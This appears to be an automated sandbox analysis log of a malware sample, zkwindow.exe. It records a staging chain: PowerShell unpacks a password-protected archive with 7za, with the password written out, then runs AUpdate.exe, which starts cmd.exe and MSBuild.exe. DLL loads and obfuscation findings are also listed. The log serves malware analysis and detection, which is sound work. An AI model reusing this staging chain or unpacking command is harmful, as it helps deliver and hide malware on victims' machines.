Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\Desktop\zkwindow.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: isscint.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: iscmplr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: isscint.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: iscmplr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: zkwindow.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: zkwindow.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: zkwindow.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: zkwindow.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: zkwindow.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: zkwindow.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: zkwindow.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: zkwindow.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: zkwindow.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: F:\scintilla\bin\Scintilla.pdb source: AUpdate.exe, 0000000B.00000002.1620913384.0000000001636000.00000002.00000001.01000000.0000000A.sdmp, isscint.dll.9.dr
Source: Binary string: wntdll.pdbUGP source: AUpdate.exe, 0000000B.00000002.1627708957.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000002.1630180715.0000000009D60000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806736742.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1807001804.0000000005010000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069294606.0000000004E15000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2070356635.00000000052F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AUpdate.exe, 0000000B.00000002.1627708957.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000002.1630180715.0000000009D60000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806736742.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1807001804.0000000005010000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069294606.0000000004E15000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2070356635.00000000052F0000.00000004.00001000.00020000.00000000.sdmp
Source: zkwindow.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: zkwindow.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: zkwindow.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: zkwindow.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: zkwindow.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013C8B50 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LoadLibraryA,GetProcAddress,SleepEx,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LoadLibraryA,GetProcAddress,CreateProcessA,FreeLibrary,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7013C8B50
PE file contains an invalid checksum
Source: vpdcuvm.16.dr Static PE information: real checksum: 0x0 should be: 0xc3233
Source: bmrmmwsgmayisp.12.dr Static PE information: real checksum: 0x0 should be: 0xc3233
Source: ISCmplr.dll.11.dr Static PE information: real checksum: 0x19db1b should be: 0x19cdc9
Source: ISCmplr.dll.9.dr Static PE information: real checksum: 0x19db1b should be: 0x19cdc9
Source: 7za.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x1472ac
Source: zkwindow.exe Static PE information: real checksum: 0x0 should be: 0x3b003
PE file contains sections with non-standard names
Source: zkwindow.exe Static PE information: section name: .fptable
Source: AUpdate.exe.9.dr Static PE information: section name: .didata
Source: ISCmplr.dll.9.dr Static PE information: section name: .didata
Source: ISCmplr.dll.11.dr Static PE information: section name: .didata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013DB784 push rsp; ret 0_2_00007FF7013DB785
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013DB78F push rcx; ret 0_2_00007FF7013DB790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFC3D8F5338 pushad ; retn 3DBBh 1_2_00007FFC3D8FAEE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFC3D8E749E push eax; iretd 1_2_00007FFC3D8E74AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFC3D8E5FED push ebx; ret 1_2_00007FFC3D8E5FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFC3D8E8169 push ebx; ret 1_2_00007FFC3D8E816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFC3D8E746E pushad ; iretd 1_2_00007FFC3D8E749D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFC3D8E43A5 push edi; iretd 1_2_00007FFC3D8E43A6
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0091368A push rcx; ret 9_2_0091368B
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D77000 push 00D770DEh; ret 11_2_00D770D6
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C680E0 push ecx; mov dword ptr [esp], edx 11_2_00C680E2
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C960A8 push ecx; mov dword ptr [esp], eax 11_2_00C960AA
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C98240 push ecx; mov dword ptr [esp], edx 11_2_00C98241
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00CE6264 push ecx; mov dword ptr [esp], edx 11_2_00CE6265
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00CE4348 push ecx; mov dword ptr [esp], edx 11_2_00CE4349
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00CE44A0 push ecx; mov dword ptr [esp], edx 11_2_00CE44A1
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C964B0 push ecx; mov dword ptr [esp], edx 11_2_00C964B1
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C68450 push ecx; mov dword ptr [esp], edx 11_2_00C68452
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C4C460 push ecx; mov dword ptr [esp], eax 11_2_00C4C465
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00CE05D8 push ecx; mov dword ptr [esp], edx 11_2_00CE05D9
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C9659C push ecx; mov dword ptr [esp], ecx 11_2_00C965A1
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00CE6598 push ecx; mov dword ptr [esp], edx 11_2_00CE6599
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C96548 push ecx; mov dword ptr [esp], ecx 11_2_00C9654C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C9854C push ecx; mov dword ptr [esp], edx 11_2_00C9854D
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C966A4 push ecx; mov dword ptr [esp], ecx 11_2_00C966A9
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C9461C push ecx; mov dword ptr [esp], eax 11_2_00C9461D
